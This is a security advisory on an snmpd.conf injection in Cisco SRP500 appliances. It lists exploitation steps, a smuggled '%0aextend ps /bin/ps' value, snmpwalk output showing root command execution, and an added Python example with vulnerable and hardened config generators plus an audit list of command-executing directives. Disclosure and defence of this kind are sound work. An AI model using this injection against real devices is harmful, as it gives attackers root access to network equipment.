Cisco SRP500 OS ROOT
About Cisco SRP500 Series
The Cisco SRP 500 Series is a Small Business Pro appliance that, according to cisco.com, offers "Integrated security, VPN capabilities, and an 802.11n wireless access point", a "(SIP) stack to deliver clear, high-quality voice service" and "Intelligence to support voice, data, security, and application services".
The appliance is managed through a web management console.
The vulnerability was tested on a Cisco SRP527W (firmware V1.01.19); Cisco confirmed that all firmware versions prior to 1.1.24 are affected.

Details
SNMPD configuration file injection
Due to a lack of input validation in the web interface, an authenticated user can inject an arbitrary line into snmpd.conf. Net-SNMP's "extend" directive runs the configured command whenever the matching MIB object is queried, and on this device that command runs as root, so the injection gives OS command execution as root.
Steps:
- Log in to the web management interface.
- Inject the line "extend ps /bin/ps" into snmpd.conf by placing a URL-encoded newline (%0a) followed by the directive in a parameter that is written to the file, using the following HTTP request:
- Query the device with snmpwalk; the output of the injected command is returned through NET-SNMP-EXTEND-MIB:
$ snmpwalk -v 1 -c public 192.168.15.1 NET-SNMP-EXTEND-MIB::nsExtendOutput1Table
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."ps" = STRING: PID USER VSZ STAT COMMAND
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."ps" = STRING: PID USER VSZ STAT COMMAND
1 admin 4472 S /sbin/init
2 admin 0 SW< [kthreadd]
3 admin 0 SWN [ksoftirqd/0]
4 admin 0 SW< [events/0]
5 admin 0 SW< [khelper]
39 admin 0 SW< [kblockd/0]
53 admin 0 SW [crypto]
54 admin 0 SW [crypto_ret]
59 admin 0 SW [pdflush]
60 admin 0 SW [pdflush]
61 admin 0 SW< [kswapd0]
62 admin 0 SW< [aio/0]
183 admin 0 SW< [mtdblockd]
184 admin 0 SW< [nftld]
280 admin 4160 S /sbin/init
282 admin 3464 S router_provisioning
283 admin 2440 S ledapp &
346 admin 1888 S hotplug_3g
347 admin 3532 S usb_3g
358 admin 0 SW< [khubd]
437 admin 0 SWN [jffs2_gcd_mtd8]
440 admin 0 SWN [jffs2_gcd_mtd3]
477 admin 0 SW< [loop0]
478 admin 0 SWN [jffs2_gcd_mtd4]
479 admin 0 SWN [jffs2_gcd_mtd6]
551 admin 1552 S syslogd -L -s 20 -b 1
553 admin 1552 S klogd
555 admin 2504 S cpu_load
556 admin 1980 S sh -c mpstat 2
557 admin 1628 S mpstat 2
560 admin 3172 S tftpd -a 192.168.15.1 -s /tmp -c -l
561 admin 1704 S cron
579 admin 4500 S httpd
583 admin 1760 S dnsmasq -C /tmp/dnsmasq.conf -r /tmp/dns_resolv.conf
599 admin 3784 S upnpd br0
609 admin 2068 S dropbear -d /etc/dropbear_dss_host_key -r /etc/dropbe
610 admin 18096 S cdpd
614 admin 3060 S cmd_server
692 admin 1980 S /bin/sh /etc/start_voice
700 admin 1552 S /usr/sbin/udhcpd /tmp/udhcpd_0.conf
706 admin 1552 S /usr/sbin/udhcpd /tmp/udhcpd_1.conf
728 admin 23144 S /sbin/spr_voip
913 admin 6308 R snmpd -c /tmp/snmpd.conf
1503 admin 1984 R /bin/ps 0.0.0.0/0.0.0.0
NET-SNMP-EXTEND-MIB::nsExtendOutNumLines."ps" = INTEGER: 45
NET-SNMP-EXTEND-MIB::nsExtendResult."ps" = INTEGER: 0
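The following Python is an added example and is not code from the Securitum advisory or from Cisco. It models the bug class behind the finding: a web handler that writes a form value into snmpd.conf one directive per line, so a URL-encoded newline (%0a) in the value smuggles in an extra "extend" directive. Beside the naive generator it shows a hardened version that rejects such values, and an audit helper that flags any directive in a generated snmpd.conf that makes snmpd execute a command. The field names, the config template and the sample form value are assumptions made for this illustration.

```python
"""
Added example (not code from the Securitum advisory or from Cisco).
Models a web handler that interpolates form values into snmpd.conf
line by line, so a URL-encoded newline in a value injects a directive.
Field names, template and sample input are assumptions.
"""
import re
import urllib.parse

# Hypothetical template the web handler writes to /tmp/snmpd.conf:
# one directive per line, values substituted verbatim.
TEMPLATE = "rocommunity {community}\nsyslocation {location}\nsyscontact {contact}\n"

# Net-SNMP directives that cause snmpd to run an external command.
COMMAND_DIRECTIVES = {"extend", "extendfix", "exec", "execfix", "sh", "pass", "pass_persist"}


def render_snmpd_conf_vulnerable(community, location, contact):
    """Naive generator: substitutes the values without any validation."""
    return TEMPLATE.format(community=community, location=location, contact=contact)


# Allow-list for a free-text SNMP field: no newline, no shell or path characters.
_SAFE_VALUE = re.compile(r"[A-Za-z0-9 ._@-]{1,64}")


def render_snmpd_conf_hardened(community, location, contact):
    """Same generator, but rejects any value that could break the line structure."""
    for name, value in (("community", community), ("location", location), ("contact", contact)):
        if _SAFE_VALUE.fullmatch(value) is None:
            raise ValueError(f"rejected value for {name}: {value!r}")
    return TEMPLATE.format(community=community, location=location, contact=contact)


def find_command_directives(conf_text):
    """Audit helper: (line number, line) for every directive that executes a command."""
    hits = []
    for lineno, raw in enumerate(conf_text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.split()[0].lower() in COMMAND_DIRECTIVES:
            hits.append((lineno, line))
    return hits


# Constructed sample: the attacker sends %0a followed by the directive
# in the "location" field, as the advisory describes for the SRP527W.
FORM_LOCATION = "Poland%0aextend ps /bin/ps"


def demo():
    """Run the injected value through both generators and the audit helper."""
    location = urllib.parse.unquote(FORM_LOCATION)  # "Poland\nextend ps /bin/ps"
    vulnerable = render_snmpd_conf_vulnerable("public", location, "admin@example.com")
    injected = find_command_directives(vulnerable)
    try:
        render_snmpd_conf_hardened("public", location, "admin@example.com")
        blocked = False
    except ValueError:
        blocked = True
    return vulnerable, injected, blocked


if __name__ == "__main__":
    conf, hits, blocked = demo()
    print(conf)
    print("command directives found:", hits)
    print("hardened generator blocked the value:", blocked)
```

The audit helper is also useful on a real device: dumping the generated snmpd.conf and checking it for extend, exec, sh and pass directives is a quick way to confirm whether a web-interface field has been abused in this way.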
Vendor's reaction / issue history
- 12.07.2011 - full disclosure sent to the vendor
- 16.09.2011 - initial, internal fix issued by the vendor
- 02.11.2011 - patch issued by the vendor, Cisco public announcement
- 25.11.2011 - public disclosure by Securitum
Thanks to Gaweł Mikołajczyk for providing test hardware.
Research / contact
- We are performing research on web management interfaces of network appliances. If you want to help, feel free to contact us at devices_hacking@securitum.pl
Disclaimer
- All the information is provided for educational use only.
- We strongly discourage using this information for cracking or other illegal purposes.
- We are not responsible for damage to your router - play with your router carefully.
michal.sajdak@securitum.pl

